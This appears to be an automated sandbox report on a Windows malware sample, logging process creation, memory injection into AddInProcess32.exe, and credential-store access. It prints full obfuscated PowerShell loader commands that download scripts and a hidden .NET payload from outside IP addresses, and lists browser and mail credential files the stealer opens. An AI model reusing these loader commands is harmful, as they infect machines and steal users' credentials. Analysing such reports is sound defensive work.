                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7EFDE008Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.cmdline"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningfiledatinglover.vBS" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC2C3.tmp" "c:\Users\user\AppData\Local\Temp\cboglgly\CSC66221087E6254F6E92E0F9138CFEC2C1.TMP"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jhlsc0ozthu3nyagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagqurelxrzugugicagicagicagicagicagicagicagicagicagic1nrw1crxjkrwzptml0sw9oicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjstu9olkrsbcisicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicbwaw1gq1nhwcxzdhjpbmcgicagicagicagicagicagicagicagicagicagieysc3ryaw5nicagicagicagicagicagicagicagicagicagicbjsfhovetzcnbilhvpbnqgicagicagicagicagicagicagicagicagicagifllusxjbnrqdhigicagicagicagicagicagicagicagicagicagiedgktsnicagicagicagicagicagicagicagicagicagicattkftzsagicagicagicagicagicagicagicagicagicaginztcelnclj2sxpviiagicagicagicagicagicagicagicagicagicaglw5hbuvtcefdzsagicagicagicagicagicagicagicagicagicagu3puvsagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagjhlsc0ozthu3nzo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5oc40ni4xnzgumtq0l2v2zw5pbmdmawxlzgf0aw5nbg92zxiudmjziiwijevodjpbufbeqvrbxgv2zw5pbmdmawxlzgf0aw5nbg92zxiudkjtiiwwldapo3n0qxjulxnmzuvqkdmpo3n0yvj0icagicagicagicagicagicagicagicagicagicaijevudjpbufbeqvrbxgv2zw5pbmdmawxlzgf0aw5nbg92zxiudkjtig=='+[char]34+'))')))"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jhlsc0ozthu3nyagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagqurelxrzugugicagicagicagicagicagicagicagicagicagic1nrw1crxjkrwzptml0sw9oicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjstu9olkrsbcisicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicbwaw1gq1nhwcxzdhjpbmcgicagicagicagicagicagicagicagicagicagieysc3ryaw5nicagicagicagicagicagicagicagicagicagicbjsfhovetzcnbilhvpbnqgicagicagicagicagicagicagicagicagicagifllusxjbnrqdhigicagicagicagicagicagicagicagicagicagiedgktsnicagicagicagicagicagicagicagicagicagicattkftzsagicagicagicagicagicagicagicagicagicaginztcelnclj2sxpviiagicagicagicagicagicagicagicagicagicaglw5hbuvtcefdzsagicagicagicagicagicagicagicagicagicagu3puvsagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagjhlsc0ozthu3nzo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5oc40ni4xnzgumtq0l2v2zw5pbmdmawxlzgf0aw5nbg92zxiudmjziiwijevodjpbufbeqvrbxgv2zw5pbmdmawxlzgf0aw5nbg92zxiudkjtiiwwldapo3n0qxjulxnmzuvqkdmpo3n0yvj0icagicagicagicagicagicagicagicagicagicaijevudjpbufbeqvrbxgv2zw5pbmdmawxlzgf0aw5nbg92zxiudkjtig=='+[char]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "(('y0ulink = xr'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xrm; y0uwebc'+'lient = new-object system.net.webclient; try { y0udownlo'+'adeddata '+'= y0uwebclient.downloadd'+'ata(y0ulink) } catch { write-'+'host xrmfailed to download data from y0ulinkxrm -foregroundc'+'olor red; exit }; if (y0udownloadeddata -ne y0unull) { y0uima'+'getext = [system.t'+'ext'+'.encoding'+']::utf8.'+'getstring(y0udownloadeddata); y0ustartflag = xrm<<b'+'ase64_start>>xrm; y0uendflag = xrm<<base64_en'+'d>>xrm; y0ustartindex = y0uimagetext.indexof(y0ustartflag); y0uendin'+'dex = y0uimagetext.indexof(y0uendflag); if (y0ustartindex -ge '+'0'+' -and y0uendind'+'ex -gt y0'+'ustartinde'+'x) { y0ustartindex += y0ustartflag.length; y0ubase64lengt'+'h = y0uendindex - y0ustartindex; y0ubase'+'64command = y0uimagetext.su'+'bstring(y0ustartindex, y0ubase64length); y0ucommandbytes = [system.convert]::frombase64string(y0ubase64command); y0uloadedassembly = [system.reflec'+'tion.assem'+'bly]::l'+'oad(y0ucommandbytes); y0utype = y0uloadedassembly.gettype(xrm'+'runpe.hom'+'exrm); y0umethod = y0utype'+'.getmethod(xrmv'+'aix'+'rm).invoke(y0unull, [object[]] (xrmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxrm , xrmdesativadoxrm , xrmdesativadoxrm , xrm'+'desativadox'+'rm,xrmaddinprocess32xrm,xrmxrm)) } }') -replace 'xrm',[char]39 -replace ([char]89+[char]48+[char]117),[char]36)|iex"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jhlsc0ozthu3nyagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagqurelxrzugugicagicagicagicagicagicagicagicagicagic1nrw1crxjkrwzptml0sw9oicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjstu9olkrsbcisicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicbwaw1gq1nhwcxzdhjpbmcgicagicagicagicagicagicagicagicagicagieysc3ryaw5nicagicagicagicagicagicagicagicagicagicbjsfhovetzcnbilhvpbnqgicagicagicagicagicagicagicagicagicagifllusxjbnrqdhigicagicagicagicagicagicagicagicagicagiedgktsnicagicagicagicagicagicagicagicagicagicattkftzsagicagicagicagicagicagicagicagicagicaginztcelnclj2sxpviiagicagicagicagicagicagicagicagicagicaglw5hbuvtcefdzsagicagicagicagicagicagicagicagicagicagu3puvsagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagjhlsc0ozthu3nzo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5oc40ni4xnzgumtq0l2v2zw5pbmdmawxlzgf0aw5nbg92zxiudmjziiwijevodjpbufbeqvrbxgv2zw5pbmdmawxlzgf0aw5nbg92zxiudkjtiiwwldapo3n0qxjulxnmzuvqkdmpo3n0yvj0icagicagicagicagicagicagicagicagicagicaijevudjpbufbeqvrbxgv2zw5pbmdmawxlzgf0aw5nbg92zxiudkjtig=='+[char]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jhlsc0ozthu3nyagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagqurelxrzugugicagicagicagicagicagicagicagicagicagic1nrw1crxjkrwzptml0sw9oicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjstu9olkrsbcisicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicbwaw1gq1nhwcxzdhjpbmcgicagicagicagicagicagicagicagicagicagieysc3ryaw5nicagicagicagicagicagicagicagicagicagicbjsfhovetzcnbilhvpbnqgicagicagicagicagicagicagicagicagicagifllusxjbnrqdhigicagicagicagicagicagicagicagicagicagiedgktsnicagicagicagicagicagicagicagicagicagicattkftzsagicagicagicagicagicagicagicagicagicaginztcelnclj2sxpviiagicagicagicagicagicagicagicagicagicaglw5hbuvtcefdzsagicagicagicagicagicagicagicagicagicagu3puvsagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagjhlsc0ozthu3nzo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5oc40ni4xnzgumtq0l2v2zw5pbmdmawxlzgf0aw5nbg92zxiudmjziiwijevodjpbufbeqvrbxgv2zw5pbmdmawxlzgf0aw5nbg92zxiudkjtiiwwldapo3n0qxjulxnmzuvqkdmpo3n0yvj0icagicagicagicagicagicagicagicagicagicaijevudjpbufbeqvrbxgv2zw5pbmdmawxlzgf0aw5nbg92zxiudkjtig=='+[char]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "(('y0ulink = xr'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xrm; y0uwebc'+'lient = new-object system.net.webclient; try { y0udownlo'+'adeddata '+'= y0uwebclient.downloadd'+'ata(y0ulink) } catch { write-'+'host xrmfailed to download data from y0ulinkxrm -foregroundc'+'olor red; exit }; if (y0udownloadeddata -ne y0unull) { y0uima'+'getext = [system.t'+'ext'+'.encoding'+']::utf8.'+'getstring(y0udownloadeddata); y0ustartflag = xrm<<b'+'ase64_start>>xrm; y0uendflag = xrm<<base64_en'+'d>>xrm; y0ustartindex = y0uimagetext.indexof(y0ustartflag); y0uendin'+'dex = y0uimagetext.indexof(y0uendflag); if (y0ustartindex -ge '+'0'+' -and y0uendind'+'ex -gt y0'+'ustartinde'+'x) { y0ustartindex += y0ustartflag.length; y0ubase64lengt'+'h = y0uendindex - y0ustartindex; y0ubase'+'64command = y0uimagetext.su'+'bstring(y0ustartindex, y0ubase64length); y0ucommandbytes = [system.convert]::frombase64string(y0ubase64command); y0uloadedassembly = [system.reflec'+'tion.assem'+'bly]::l'+'oad(y0ucommandbytes); y0utype = y0uloadedassembly.gettype(xrm'+'runpe.hom'+'exrm); y0umethod = y0utype'+'.getmethod(xrmv'+'aix'+'rm).invoke(y0unull, [object[]] (xrmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxrm , xrmdesativadoxrm , xrmdesativadoxrm , xrm'+'desativadox'+'rm,xrmaddinprocess32xrm,xrmxrm)) } }') -replace 'xrm',[char]39 -replace ([char]89+[char]48+[char]117),[char]36)|iex"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.powershell.exe.12778558.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.powershell.exe.12778558.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.618907462.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.510894342.000000001241D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3324, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 3440, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.powershell.exe.12778558.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.powershell.exe.12778558.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.618907462.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.619170569.0000000002465000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.510894342.000000001241D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3324, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 3440, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
